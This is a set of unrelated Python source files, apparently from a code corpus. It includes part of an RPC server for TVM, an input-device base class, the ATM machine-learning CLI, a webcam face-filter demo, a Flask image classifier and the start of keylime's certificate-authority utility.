logger.info("Timeout in RPC session, kill..")
server_proc.terminate()
def _connect_proxy_loop(addr, key, load_library, silent):
logger = logging.getLogger("RPCProxy")
if silent:
logger.disabled = True
key = "server:" + key
retry_count = 0
max_retry = 5
retry_period = 5
while True:
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(addr)
sock.sendall(struct.pack("<i", base.RPC_MAGIC))
sock.sendall(struct.pack("<i", len(key)))
sock.sendall(key.encode("utf-8"))
magic = struct.unpack("<i", base.recvall(sock, 4))[0]
if magic == base.RPC_CODE_DUPLICATE:
raise RuntimeError("key: %s has already been used in proxy" % key)
elif magic == base.RPC_CODE_MISMATCH:
logger.info("RPCProxy do not have matching client key %s", key)
elif magic != base.RPC_CODE_SUCCESS:
raise RuntimeError("%s is not RPC Proxy" % str(addr))
keylen = struct.unpack("<i", base.recvall(sock, 4))[0]
remote_key = py_str(base.recvall(sock, keylen))
opts = _parse_server_opt(remote_key.split()[1:])
logger.info("connected to %s", str(addr))
process = multiprocessing.Process(
target=_serve_loop, args=(sock, addr, load_library, silent))
process.deamon = True
process.start()
sock.close()
process.join(opts.get("timeout", None))
if process.is_alive():
logger.info("Timeout in RPC session, kill..")
process.terminate()
retry_count = 0
except (socket.error, IOError) as err:
retry_count += 1
logger.info("Error encountered %s, retry in %g sec", str(err), retry_period)
if retry_count > max_retry:
raise RuntimeError("Maximum retry error: last error: %s" % str(err))
time.sleep(retry_period)
def _popen(cmd):
proc = subprocess.Popen(cmd,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
env=os.environ)
(out, _) = proc.communicate()
if proc.returncode != 0:
msg = "Server invoke error:\n"
msg += out
raise RuntimeError(msg)
class Server(object):
"""Start RPC server on a separate process.
This is a simple python implementation based on multi-processing.
It is also possible to implement a similar C based sever with
TVM runtime which does not depend on the python.
Parameters
----------
host : str
The host url of the server.
port : int
The port to be bind to
port_end : int, optional
The end port to search
is_proxy : bool, optional
Whether the address specified is a proxy.
If this is true, the host and port actually corresponds to the
address of the proxy server.
use_popen : bool, optional
Whether to use Popen to start a fresh new process instead of fork.
This is recommended to switch on if we want to do local RPC demonstration
for GPU devices to avoid fork safety issues.
tracker_addr: Tuple (str, int) , optional
The address of RPC Tracker in tuple(host, ip) format.
If is not None, the server will register itself to the tracker.
key : str, optional
The key used to identify the device type in tracker.
load_library : str, optional
List of additional libraries to be loaded during execution.
custom_addr: str, optional
Custom IP Address to Report to RPC Tracker
silent: bool, optional
Whether run this server in silent mode.
"""
def __init__(self,
host,
port=9091,
port_end=9199,
is_proxy=False,
use_popen=False,
tracker_addr=None,
key="",
load_library=None,
custom_addr=None,
silent=False):
try:
if base._ServerLoop is None:
raise RuntimeError("Please compile with USE_RPC=1")
except NameError:
raise RuntimeError("Please compile with USE_RPC=1")
self.host = host
self.port = port
self.libs = []
self.custom_addr = custom_addr
self.use_popen = use_popen
self.logger = logging.getLogger("RPCServer")
if silent:
self.logger.disabled = True
if use_popen:
cmd = [sys.executable,
"-m", "tvm.exec.rpc_server",
"--host=%s" % host,
"--port=%s" % port]
if tracker_addr:
assert key
cmd += ["--tracker=%s:%d" % tracker_addr,
"--key=%s" % key]
if load_library:
cmd += ["--load-library", load_library]
if custom_addr:
cmd += ["--custom-addr", custom_addr]
if silent:
cmd += ["--silent"]
self.proc = subprocess.Popen(cmd, preexec_fn=os.setsid)
time.sleep(0.5)
elif not is_proxy:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.port = None
for my_port in range(port, port_end):
try:
sock.bind((host, my_port))
self.port = my_port
break
except socket.error as sock_err:
if sock_err.errno in [98, 48]:
continue
else:
raise sock_err
if not self.port:
raise ValueError("cannot bind to any port in [%d, %d)" % (port, port_end))
self.logger.info("bind to %s:%d", host, self.port)
sock.listen(1)
self.sock = sock
self.proc = multiprocessing.Process(
target=_listen_loop, args=(
self.sock, self.port, key, tracker_addr, load_library,
self.custom_addr, silent))
self.proc.deamon = True
self.proc.start()
else:
self.proc = multiprocessing.Process(
target=_connect_proxy_loop, args=((host, port), key, load_library, silent))
self.proc.deamon = True
self.proc.start()
def terminate(self):
"""Terminate the server process"""
if self.use_popen:
if self.proc:
os.killpg(self.proc.pid, signal.SIGTERM)
self.proc = None
else:
if self.proc:
self.proc.terminate()
self.proc = None
def __del__(self):
self.terminate()
|
skeleton.py
|
import threading
from copy import copy
from helpers import setup_logger
logger = setup_logger(__name__, "warning")
class InputSkeleton(object):
"""Base class for input devices. Expectations from children:
* ``self.default_mapping`` variable to be set unless you're always going to pass mapping as argument in config
* ``self.runner`` to be set to a function that'll run in backround, scanning for button presses and sending events to send_key
* main thread to stop sending keys if self.enabled is False
* main thread to exit immediately if self.stop_flag is True"""
enabled = True
stop_flag = False
available_keys = None
def __init__(self, mapping=None, threaded=True):
if mapping is not None:
self.mapping = mapping
else:
self.mapping = self.default_mapping
try:
self.init_hw()
except AttributeError:
logger.error("{}: init_hw function not found!".format(self.__class__))
self.set_available_keys()
if threaded:
self.start_thread()
def start(self):
"""Sets the ``enabled`` for loop functions to start sending keycodes."""
self.enabled = True
def set_available_keys(self):
"""
A simple ``i.available_keys``-setting code that assumes the driver's mapping is a plain
list of key names. If it's not so, the driver needs to override the
``set_available_keys`` method to properly generate the ``available_keys`` list.
"""
if not hasattr(self, "mapping"):
logger.warning("mapping not available - the HID driver is used?")
logger.warning("available_keys property set to None!")
self.available_keys = None
return
if type(self.mapping) not in (list, tuple):
raise ValueError("Can't use mapping as available_keys - not a list/tuple!")
if not all([isinstance(el, basestring) for el in self.mapping]):
raise ValueError("Can't use mapping as a capability if it's not a list of strings!")
if not all([el.startswith("KEY_") for el in self.mapping]):
nonkey_items = [el for el in self.mapping if not el.startswith("KEY_")]
raise ValueError("Can't use mapping as a capability if its elements don't start with \"KEY_\"! (non-KEY_ items: {})".format(nonkey_items))
self.available_keys = copy(list(self.mapping))
def stop(self):
"""Unsets the ``enabled`` for loop functions to stop sending keycodes."""
self.enabled = False
def send_key(self, key):
"""A hook to be overridden by ``InputListener``. Otherwise, prints out key names as soon as they're pressed so is useful for debugging (to test things, just launch the driver as ``python driver.py``)"""
logger.debug(key)
def start_thread(self):
"""Starts a thread with ``start`` function as target."""
self.thread = threading.Thread(target=self.runner)
self.thread.daemon = True
self.thread.start()
def atexit(self):
self.stop_flag = True
|
cli.py
|
# -*- coding: utf-8 -*-
import argparse
import glob
import logging
import multiprocessing
import os
import shutil
import time
import psutil
from daemon import DaemonContext
from lockfile.pidlockfile import PIDLockFile
from atm.api import create_app
from atm.config import AWSConfig, DatasetConfig, LogConfig, RunConfig, SQLConfig
from atm.core import ATM
LOGGER = logging.getLogger(__name__)
def _get_atm(args):
sql_conf = SQLConfig(args)
aws_conf = AWSConfig(args)
log_conf = LogConfig(args)
return ATM(sql_conf, aws_conf, log_conf)
def _work(args, wait=False):
"""Creates a single worker."""
atm = _get_atm(args)
atm.work(
datarun_ids=getattr(args, 'dataruns', None),
choose_randomly=False,
save_files=args.save_files,
cloud_mode=args.cloud_mode,
total_time=getattr(args, 'total_time', None),
wait=wait
)
def _serve(args):
"""Launch the ATM API with the given host / port."""
atm = _get_atm(args)
app = create_app(atm, getattr(args, 'debug', False))
app.run(host=args.host, port=args.port)
def _get_pid_path(pid):
"""Returns abspath of the pid file which is stored on the cwd."""
pid_path = pid
if not os.path.isabs(pid_path):
pid_path = os.path.join(os.getcwd(), pid_path)
return pid_path
def _get_atm_process(pid_path):
"""Return `psutil.Process` of the `pid` file. If the pidfile is stale it will release it."""
pid_file = PIDLockFile(pid_path, timeout=1.0)
if pid_file.is_locked():
pid = pid_file.read_pid()
try:
process = psutil.Process(pid)
if process.name() == 'atm':
return process
else:
pid_file.break_lock()
except psutil.NoSuchProcess:
pid_file.break_lock()
def _status(args):
"""Check if the current ATM process is runing."""
pid_path = _get_pid_path(args.pid)
process = _get_atm_process(pid_path)
if process:
workers = 0
addr = None
for child in process.children():
connections = child.connections()
if connections:
connection = connections[0]
addr = connection.laddr
else:
workers += 1
s = 's' if workers > 1 else ''
print('ATM is running with {} worker{}'.format(workers, s))
if addr:
print('ATM REST server is listening on http://{}:{}'.format(addr.ip, addr.port))
else:
print('ATM is not runing.')
def _start_background(args):
"""Launches the server/worker in daemon processes."""
if args.server:
LOGGER.info('Starting the REST API server')
process = multiprocessing.Process(target=_serve, args=(args, ))
process.daemon = True
process.start()
pool = multiprocessing.Pool(args.workers)
for _ in range(args.workers):
LOGGER.info('Starting background worker')
pool.apply_async(_work, args=(args, True))
pool.close()
pool.join()
def _start(args):
"""Create a new process of ATM pointing the process to a certain `pid` file."""
pid_path = _get_pid_path(args.pid)
process = _get_atm_process(pid_path)
if process:
print('ATM is already running!')
else:
print('Starting ATM')
if args.foreground:
_start_background(args)
else:
pidfile = PIDLockFile(pid_path, timeout=1.0)
with DaemonContext(pidfile=pidfile, working_directory=os.getcwd()):
# Set up default log file if not already set
if not args.logfile:
_logging_setup(args.verbose, 'atm.log')
_start_background(args)
def _stop(args):
"""Stop the current running process of ATM."""
pid_path = _get_pid_path(args.pid)
process = _get_atm_process(pid_path)
if process:
process.terminate()
for _ in range(args.timeout):
if process.is_running():
time.sleep(1)
else:
break
if process.is_running():
print('ATM was not able to stop after {} seconds.'.format(args.timeout))
if args.force:
print('Killing it.')
process.kill()
else:
print('Use --force to kill it.')
else:
print('ATM stopped correctly.')
else:
print('ATM is not running.')
def _restart(args):
_stop(args)
time.sleep(1)
pid_path = _get_pid_path(args.pid)
process = _get_atm_process(pid_path)
if process:
print('ATM did not stop correctly. Aborting')
else:
_start(args)
def _enter_data(args):
atm = _get_atm(args)
run_conf = RunConfig(args)
dataset_conf = DatasetConfig(args)
atm.enter_data(dataset_conf, run_conf)
def _copy_files(pattern, source, target=None):
if isinstance(source, (list, tuple)):
source = os.path.join(*source)
if target is None:
target = source
source_dir = os.path.join(os.path.dirname(__file__), source)
target_dir = os.path.join(os.getcwd(), target)
if not os.path.exists(target_dir):
os.makedirs(target_dir)
for source_file in glob.glob(os.path.join(source_dir, pattern)):
target_file = os.path.join(target_dir, os.path.basename(source_file))
print('Generating file {}'.format(target_file))
shutil.copy(source_file, target_file)
def _make_config(args):
_copy_files('*.yaml', ('config', 'templates'))
def _get_demos(args):
_copy_files('*.csv', ('data', 'test'), 'demos')
def _get_parser():
logging_args = argparse.ArgumentParser(add_help=False)
logging_args.add_argument('-v', '--verbose', action='count', default=0)
logging_args.add_argument('-l', '--logfile')
parser = argparse.ArgumentParser(description='ATM Command Line Interface',
parents=[logging_args])
subparsers = parser.add_subparsers(title='action', help='Action to perform')
parser.set_defaults(action=None)
# Common Arguments
sql_args = SQLConfig.get_parser()
aws_args = AWSConfig.get_parser()
log_args = LogConfig.get_parser()
run_args = RunConfig.get_parser()
dataset_args = DatasetConfig.get_parser()
# Enter Data Parser
enter_data_parents = [
logging_args,
sql_args,
aws_args,
dataset_args,
log_args,
run_args
]
enter_data = subparsers.add_parser('enter_data', parents=enter_data_parents,
help='Add a Dataset and trigger a Datarun on it.')
enter_data.set_defaults(action=_enter_data)
# Wroker Args
worker_args = argparse.ArgumentParser(add_help=False)
worker_args.add_argument('--cloud-mode', action='store_true', default=False,
help='Whether to run this worker in cloud mode')
worker_args.add_argument('--no-save', dest='save_files', action='store_false',
help="don't save models and metrics at all")
# Worker
worker_parents = [
logging_args,
worker_args,
sql_args,
aws_args,
log_args
]
worker = subparsers.add_parser('worker', parents=worker_parents,
help='Start a single worker in foreground.')
worker.set_defaults(action=_work)
worker.add_argument('--dataruns', help='Only train on dataruns with these ids', nargs='+')
worker.add_argument('--total-time', help='Number of seconds to run worker', type=int)
# Server Args
server_args = argparse.ArgumentParser(add_help=False)
server_args.add_argument('--host', help='IP to listen at')
server_args.add_argument('--port', help='Port to listen at', type=int)
# Server
server = subparsers.add_parser('server', parents=[logging_args, server_args, sql_args],
help='Start the REST API Server in foreground.')
server.set_defaults(action=_serve)
server.add_argument('--debug', help='Start in debug mode', action='store_true')
# add_arguments_sql(server)
# Background Args
background_args = argparse.ArgumentParser(add_help=False)
background_args.add_argument('--pid', help='PID file to use.', default='atm.pid')
# Start Args
start_args = argparse.ArgumentParser(add_help=False)
start_args.add_argument('--foreground', action='store_true', help='Run on foreground')
start_args.add_argument('-w', '--workers', default=1, type=int, help='Number of workers')
start_args.add_argument('--no-server', dest='server', action='store_false',
help='Do not start the REST server')
# Start
start_parents = [
logging_args,
worker_args,
server_args,
background_args,
start_args,
sql_args,
aws_args,
log_args
]
start = subparsers.add_parser('start', parents=start_parents,
help='Start an ATM Local Cluster.')
start.set_defaults(action=_start)
# Status
status = subparsers.add_parser('status', parents=[logging_args, background_args])
status.set_defaults(action=_status)
# Stop Args
stop_args = argparse.ArgumentParser(add_help=False)
stop_args.add_argument('-t', '--timeout', default=5, type=int,
help='Seconds to wait before killing the process.')
stop_args.add_argument('-f', '--force', action='store_true',
help='Kill the process if it does not terminate gracefully.')
# Stop
stop = subparsers.add_parser('stop', parents=[logging_args, stop_args, background_args],
help='Stop an ATM Local Cluster.')
stop.set_defaults(action=_stop)
# restart
restart = subparsers.add_parser('restart', parents=start_parents + [stop_args],
help='Restart an ATM Local Cluster.')
restart.set_defaults(action=_restart)
# Make Config
make_config = subparsers.add_parser('make_config', parents=[logging_args],
help='Generate a config templates folder in the cwd.')
make_config.set_defaults(action=_make_config)
# Get Demos
get_demos = subparsers.add_parser('get_demos', parents=[logging_args],
help='Generate a demos folder with demo CSVs in the cwd.')
get_demos.set_defaults(action=_get_demos)
return parser
def _logging_setup(verbosity=1, logfile=None):
logger = logging.getLogger()
log_level = (2 - verbosity) * 10
fmt = '%(asctime)s - %(process)d - %(levelname)s - %(module)s - %(message)s'
formatter = logging.Formatter(fmt)
logger.setLevel(log_level)
logger.propagate = False
if logfile:
file_handler = logging.FileHandler(logfile)
file_handler.setLevel(logging.DEBUG)
file_handler.setFormatter(formatter)
logger.addHandler(file_handler)
else:
console_handler = logging.StreamHandler()
console_handler.setLevel(log_level)
console_handler.setFormatter(formatter)
logger.addHandler(console_handler)
def main():
parser = _get_parser()
args = parser.parse_args()
_logging_setup(args.verbose, args.logfile)
if not args.action:
parser.print_help()
parser.exit()
args.action(args)
|
snapchat_demo.py
|
from tkinter import *
from PIL import Image
from PIL import ImageTk
import cv2
import threading
import os
import time
from threading import Thread
from os import listdir
from os.path import isfile, join
import dlib
from imutils import face_utils, rotate_bound
import math
# body part IDs for retrieving face landmark info
LEFT_EYEBROW = 1
RIGHT_EYEBROW = 2
LEFT_EYE = 3
RIGHT_EYE = 4
NOSE = 5
MOUTH = 6
ALL_SPRITES = ["Hat", "Mustache", "Flies", "Glasses", "Doggy", "Rainbow", "Googly Eyes"]
WINDOW_NAME = "Not really snapchat"
# class Sprite:
# def __init__(self, name, id):
# self.name = name
# self.id = id
# self.enabled = False
# class StaticSprite(Sprite):
# def __init__(self, name, id, file):
# super().__init__(name, id)
# self.file = file
# def get_sprite(self):
# return self.file
# class AnimatedSprite():
# def __init__(self, name, id, files_dir):
# super().__init__(name, id)
# self.files = files_dir
# self.counter = 0
# def get_sprite(self):
# return self.files[self.counter]
# def animate(self):
# self.counter = (self.counter + 1) % len(self.files)
def toggle_sprite(num):
global SPRITES, BTNS
SPRITES[num] = not SPRITES[num]
BTNS[num].config(relief=SUNKEN if SPRITES[num] else RAISED)
def draw_sprite(frame, sprite, x_offset, y_offset):
(h, w) = (sprite.shape[0], sprite.shape[1])
(imgH, imgW) = (frame.shape[0], frame.shape[1])
if y_offset + h >= imgH: # if sprite gets out of image in the bottom
sprite = sprite[0:imgH - y_offset, :, :]
if x_offset + w >= imgW: # if sprite gets out of image to the right
sprite = sprite[:, 0:imgW - x_offset, :]
if x_offset < 0: # if sprite gets out of image to the left
sprite = sprite[:, abs(x_offset)::, :]
w = sprite.shape[1]
x_offset = 0
# for each RGB chanel
for ch in range(3):
# chanel 4 is alpha: 255 is not transparent, 0 is transparent background
sprite_pixel = sprite[:, :, ch]
sprite_alpha = (sprite[:, :, 3] / 255.0)
img_pixel = frame[y_offset:y_offset + h, x_offset:x_offset + w, ch]
img_alpha = (1.0 - sprite_alpha)
frame[y_offset:y_offset + h, x_offset:x_offset + w, ch] = sprite_pixel * sprite_alpha + img_pixel * img_alpha
return frame
def adjust_sprite2head(sprite, head_width, head_ypos, ontop=True):
(h_sprite, w_sprite) = (sprite.shape[0], sprite.shape[1])
factor = 1.0 * head_width / w_sprite
# adjust to have the same width as head
sprite = cv2.resize(sprite, (0, 0), fx=factor, fy=factor)
(h_sprite, w_sprite) = (sprite.shape[0], sprite.shape[1])
# adjust the position of sprite to end where the head begins
y_orig = (head_ypos - h_sprite) if ontop else head_ypos
if (y_orig < 0): # check if the head is not to close to the top of the image and the sprite would not fit in the screen
sprite = sprite[abs(y_orig)::, :, :] # in that case, we cut the sprite
y_orig = 0 # the sprite then begins at the top of the image
return (sprite, y_orig)
def apply_sprite(image, path2sprite, w, x, y, angle, ontop=True):
sprite = cv2.imread(path2sprite, -1)
sprite = rotate_bound(sprite, angle)
(sprite, y_final) = adjust_sprite2head(sprite, w, y, ontop)
image = draw_sprite(image, sprite, x, y_final)
def calc_slope(point1, point2):
x1, x2, y1, y2 = point1[0], point2[0], point1[1], point2[1]
incl_rad = math.atan((float(y2 - y1)) / (x2 - x1))
incl_deg = 180 / math.pi * incl_rad
return incl_deg
def calculate_boundbox(coords):
x = min(coords[:, 0])
y = min(coords[:, 1])
w = max(coords[:, 0]) - x
h = max(coords[:, 1]) - y
return (x, y, w, h)
def get_face_boundbox(points, face_part):
input_points = None
if face_part == LEFT_EYEBROW:
input_points = points[17:22]
elif face_part == RIGHT_EYEBROW:
input_points = points[22:27]
elif face_part == LEFT_EYE:
input_points = points[36:42]
elif face_part == RIGHT_EYE:
input_points = points[42:48]
elif face_part == NOSE:
input_points = points[29:36]
elif face_part == MOUTH:
input_points = points[48:68]
else:
raise NotImplementedError(f'Invalid face part requested for bounding box! ID: {face_part}')
(x, y, w, h) = calculate_boundbox(input_points)
return (x, y, w, h)
def cvloop(run_event):
global main_panel
global SPRITES
# for flies animation
dir_ = "./sprites/flies/"
flies = [f for f in listdir(dir_) if isfile(join(dir_, f))]
i = 0
video_capture = cv2.VideoCapture(0)
# acquire dlib's face detector
face_detector = dlib.get_frontal_face_detector()
# load facial landmarks model
print("[INFO] loading facial landmark predictor...")
model = "filters/shape_predictor_68_face_landmarks.dat"
# link to model: http://dlib.net/files/shape_predictor_68_face_landmarks.dat.bz2
predictor = dlib.shape_predictor(model)
while run_event.is_set(): # while the thread is active we loop
ret, image = video_capture.read()
gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
faces = face_detector(gray, 0)
for face in faces: # if there are faces
(x, y, w, h) = (face.left(), face.top(), face.width(), face.height())
# find facial landmarks
shape = predictor(gray, face)
shape = face_utils.shape_to_np(shape)
# get face tilt inclination based on eyebrows
incl = calc_slope(shape[17], shape[26])
# check if mouth is open for doggy filter
# y coordiantes of landmark points of lips
is_mouth_open = (shape[66][1] - shape[62][1]) >= 10
# add a hat
if SPRITES[0]:
apply_sprite(image, "./sprites/hat.png", w, x, y, incl)
# add a mustache
if SPRITES[1]:
(x1, y1, w1, h1) = get_face_boundbox(shape, 6)
apply_sprite(image, "./sprites/mustache.png", w1, x1, y1, incl)
# add some animated flies
if SPRITES[2]:
apply_sprite(image, dir_ + flies[i], w, x, y, incl)
# when done with all images of that folder, begin again
i = (i + 1) % len(flies)
# add some glasses
if SPRITES[3]:
(x3, y3, _, h3) = get_face_boundbox(shape, 1)
apply_sprite(image, "./sprites/glasses.png", w, x, y3, incl, ontop=False)
# add some doggy things
(x0, y0, w0, h0) = get_face_boundbox(shape, 6) # bound box of mouth
if SPRITES[4]:
(x3, y3, w3, h3) = get_face_boundbox(shape, 5) # nose
apply_sprite(image, "./sprites/doggy_nose.png", w3, x3, y3, incl, ontop=False)
apply_sprite(image, "./sprites/doggy_ears.png", w, x, y, incl)
if is_mouth_open:
apply_sprite(image, "./sprites/doggy_tongue.png", w0, x0, y0, incl, ontop=False)
if SPRITES[5]:
if is_mouth_open:
apply_sprite(image, "./sprites/rainbow.png", w0, x0, y0, incl, ontop=False)
if SPRITES[6]:
(left_x5, left_y5, left_w5, left_h5) = get_face_boundbox(shape, 3)
(right_x5, right_y5, right_w5, right_h5) = get_face_boundbox(shape, 4)
apply_sprite(image, "./sprites/eye.png", w // 6, left_x5, left_y5, incl, ontop=False)
apply_sprite(image, "./sprites/eye.png", w // 6, right_x5, right_y5, incl, ontop=False)
# OpenCV == BGR; PIL == RGB
image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
image = Image.fromarray(image)
image = ImageTk.PhotoImage(image)
main_panel.configure(image=image)
main_panel.image = image
video_capture.release()
# Initialize GUI object
root = Tk()
root.title("Not really Snapchat")
BTNS = []
for (id, name) in enumerate(ALL_SPRITES):
def do_toggle_sprite(id):
return lambda: toggle_sprite(id)
btn = Button(root, text=name, command=do_toggle_sprite(id))
btn.pack(side="top", fill="both", expand="no", padx="5", pady="5")
BTNS.append(btn)
main_panel = Label(root)
main_panel.pack(padx=10, pady=10)
SPRITES = [False] * len(BTNS)
# Creates a thread for openCV processing
run_event = threading.Event()
run_event.set()
action = Thread(target=cvloop, args=(run_event,))
action.setDaemon(True)
action.start()
# Function to clean everything up
def terminate():
global root, run_event, action
print("Cleaning up OpenCV resources...")
run_event.clear()
time.sleep(1)
# action.join() #strangely in Linux this thread does not terminate properly, so .join never finishes
root.destroy()
print("All closed!")
# When the GUI is closed it actives the terminate function
root.protocol("WM_DELETE_WINDOW", terminate)
root.mainloop() # creates loop of GUI
|
app.py
|
import cv2, json, os
import requests
import numpy as np
import configparser
from threading import Thread
import tensorflow as tf
from flask import Flask, jsonify, request, render_template, redirect, url_for, send_from_directory
from keras.layers import Input
from keras.models import Sequential, Model, load_model
from keras.layers.core import Flatten
from keras.layers import GlobalAveragePooling2D
from keras.applications.xception import Xception
from keras.applications.mobilenet import MobileNet
from keras.applications.resnet50 import ResNet50
from sklearn.externals import joblib
app = Flask(__name__)
UPLOAD_FOLDER = './upload'
app.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER
graph1 = None
model1 = None
reducer1 = None
reducer2 = None
reducer3 = None
reducer4 = None
classifier = None
label_dict = {}
con_l_dict = {}
URL = 'http://127.0.0.1:5001'
app.config['MOBILENET_URL'] = URL
def classify_process():
global model1, graph1
global reducer1, reducer2, reducer3, reducer4, classifier
tmp_dict = {row.strip().split(',')[1]: 0 for row in open('./models/label.csv', 'r')}
print(tmp_dict)
count = 0
for key in tmp_dict.keys():
label_dict[str(count)] = key
count += 1
graph1 = tf.get_default_graph()
with graph1.as_default():
shape = (224, 224, 3)
input_tensor = Input(shape=shape)
base_model = ResNet50(weights='imagenet', include_top=False, input_tensor=input_tensor)
added_layer = GlobalAveragePooling2D()(base_model.output)
model1 = Model(inputs=base_model.input, outputs=added_layer)
reducer1 = joblib.load('./models/c_umap_model.sav')
reducer2 = joblib.load('./models/r_umap_model.sav')
reducer3 = joblib.load('./models/g_umap_model.sav')
reducer4 = joblib.load('./models/b_umap_model.sav')
classifier = joblib.load('./models/randumforest_model.sav')
@app.route('/', methods = ["GET", "POST"])
def root():
if request.method == 'GET':
return render_template('index.html')
elif request.method == "POST":
f = request.files['FILE']
f_path = save_img(f)
files = {'FILE': (f.filename, open(f_path, 'rb'))}
response = requests.post(app.config['MOBILENET_URL']+'/predict', files=files)
pred1 = json.loads(response.content)['data']
print('Rigel')
print(pred1)
pred2 = predict_core([f_path]).data.decode('utf-8')
pred2 = json.loads(pred2)['data']
print('Betelguse')
print(pred2)
result = make_result(pred1, pred2, [f_path])
path = os.path.join(app.config['UPLOAD_FOLDER'], f.filename)
return render_template(
'index.html',
filepath=path,
predict=result[0]
)
@app.route('/upload/<filename>')
def get_file(filename):
return send_from_directory(app.config['UPLOAD_FOLDER'], filename)
def make_result(x1, x2, path_list):
pred = (np.array(x1) + np.array(x2)) / 2
names = [item.split('/')[-1] for item in path_list]
result = []
for idx in range(len(pred)):
order = pred[idx].argsort()
cl1 = order[-1]
cl2 = order[-2]
item = {
'name': names[idx],
'class1': (label_dict[str(cl1)], str(pred[idx][cl1])),
'class2': (label_dict[str(cl2)], str(pred[idx][cl2])),
}
result.append(item)
print(result)
return result
def save_img(f):
stream = f.stream
img_array = np.asarray(bytearray(stream.read()), dtype=np.uint8)
img = cv2.imdecode(img_array, 1)
f_path = UPLOAD_FOLDER+'/'+f.filename
cv2.imwrite(f_path, img)
return f_path
def predict_core(path_list):
global model1, graph1
global reducer1, reducer2, classifier
data = preprocess(path_list)
names = [item.split('/')[-1] for item in path_list]
r_hists, g_hists, b_hists = [], [], []
for f_path in path_list:
print(f_path)
img = cv2.imread(f_path)
img = cv2.resize(img, (224, 224))
r_hist = cv2.calcHist([img], [0], None, [256], [0,256])
g_hist = cv2.calcHist([img], [1], None, [256], [0,256])
b_hist = cv2.calcHist([img], [2], None, [256], [0,256])
r_hists.append([item[0] for item in r_hist])
g_hists.append([item[0] for item in g_hist])
b_hists.append([item[0] for item in b_hist])
with graph1.as_default():
features = model1.predict(data)
features = reducer1.transform(features)
r_hists = reducer2.transform(r_hists)
g_hists = reducer3.transform(g_hists)
b_hists = reducer4.transform(b_hists)
reduced_features = np.concatenate([features, r_hists, g_hists, b_hists], 1)
pred = classifier.predict_proba(reduced_features)
# print(pred)
return jsonify({
'status': 'OK',
'data': pred.tolist()
})
def preprocess(f_list):
datas = []
for f_path in f_list:
print(f_path)
img = cv2.imread(f_path)
img = cv2.resize(img, (224, 224))
img = img.astype(np.float32) / 255.0
datas.append(img)
datas = np.asarray(datas)
return datas
def abortWithInvalidParams(reason, debug={}):
abort(400, {
'errorCode': 1,
'description': 'invalid params',
'reason': reason,
'debug': debug,
})
def abortWithNoItem(reason, debug={}):
abort(404, {
'errorCode': 2,
'description': 'no item',
'reason': reason,
'debug': debug,
})
def abortWithServerError(reason, debug={}):
abort(500, {
'errorCode': 3,
'description': 'server error',
'reason': reason,
'debug': debug,
})
if __name__ == "__main__":
t = Thread(target=classify_process, args=())
t.daemon = True
t.start()
print(" * Flask starting server...")
app.run(host='0.0.0.0', port=80, debug=True)
|
ca_util.py
|
#!/usr/bin/python3
'''
SPDX-License-Identifier: Apache-2.0
Copyright 2017 Massachusetts Institute of Technology.
Tools for creating a CA cert and signed server certs.
Divined from http://svn.osafoundation.org/m2crypto/trunk/tests/test_x509.py
The mk_temporary_xxx calls return a NamedTemporaryFile with certs.
Usage ;
# Create a temporary CA cert and it's private key
cacert, cakey = mk_temporary_cacert()
# Create a temporary server cert+key, signed by the CA
server_cert = mk_temporary_cert(cacert.name, cakey.name, '*.server.co.uk')
protips
# openssl verify -CAfile cacert.crt cacert.crt cert.crt
# openssl x509 -in cert.crt -noout -text
# openssl x509 -in cacert.crt -noout -text
'''
import sys
import os
import base64
import argparse
import datetime
import getpass
import glob
import zipfile
import io
import socket
import threading
from http.server import HTTPServer, BaseHTTPRequestHandler
from socketserver import ThreadingMixIn
import time
import yaml
try:
from yaml import CSafeLoader as SafeLoader, CSafeDumper as SafeDumper
except ImportError:
from yaml import SafeLoader, SafeDumper
from cryptography import exceptions as crypto_exceptions
from cryptography import x509
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import serialization
from cryptography.hazmat.primitives.asymmetric import padding
from keylime import cmd_exec
from keylime import config
from keylime import crypto
from keylime import fs_util
from keylime import json
from keylime import revocation_notifier
from keylime import keylime_logging
logger = keylime_logging.init_logging('ca-util')
if config.CA_IMPL == 'cfssl':
from keylime import ca_impl_cfssl as ca_impl
elif config.CA_IMPL == 'openssl':
from keylime import ca_impl_openssl as ca_impl
else:
raise Exception("Unknown CA implementation: %s" % config.CA_IMPL)
global_password = None
def load_cert_by_path(cert_path):
cert = None
with open(cert_path, 'rb') as ca_file:
cert = x509.load_pem_x509_certificate(
data=ca_file.read(),
backend=default_backend(),
)
return cert
def setpassword(pw):
global global_password
if len(pw) == 0:
raise Exception("You must specify a password!")
global_password = pw
def cmd_mkcert(workingdir, name):
cwd = os.getcwd()
try:
fs_util.ch_dir(workingdir)
priv = read_private()
cacert = load_cert_by_path('cacert.crt')
ca_pk = serialization.load_pem_private_key(
priv[0]['ca'],
password=None,
backend=default_backend()
)
cert, pk = ca_impl.mk_signed_cert(
cacert, ca_pk, name, priv[0]['lastserial'] + 1)
with open('%s-cert.crt' % name, 'wb') as f:
f.write(cert.public_bytes(serialization.Encoding.PEM))
priv[0][name] = pk.private_bytes(
encoding=serialization.Encoding.PEM,
format=serialization.PrivateFormat.PKCS8,
encryption_algorithm=serialization.NoEncryption(),
)
# increment serial number after successful creation
priv[0]['lastserial'] += 1
write_private(priv)
with os.fdopen(os.open("%s-private.pem" % name, os.O_WRONLY | os.O_CREAT, 0o600), 'wb') as f:
f.write(priv[0][name])
with os.fdopen(os.open("%s-public.pem" % name, os.O_WRONLY | os.O_CREAT, 0o600), 'wb') as f:
f.write(pk.public_key().public_bytes(
encoding=serialization.Encoding.PEM,
format=serialization.PublicFormat.SubjectPublicKeyInfo
))
cc = load_cert_by_path('%s-cert.crt' % name)
pubkey = cacert.public_key()
pubkey.verify(
cc.signature,
cc.tbs_certificate_bytes,
padding.PKCS1v15(),
cc.signature_hash_algorithm,
)
logger.info(f"Created certificate for name {name} successfully in {workingdir}")
except crypto_exceptions.InvalidSignature:
logger.error("ERROR: Cert does not validate against CA")
finally:
os.chdir(cwd)
def cmd_init(workingdir):
cwd = os.getcwd()
try:
fs_util.ch_dir(workingdir)
rmfiles("*.pem")
rmfiles("*.crt")
rmfiles("*.zip")
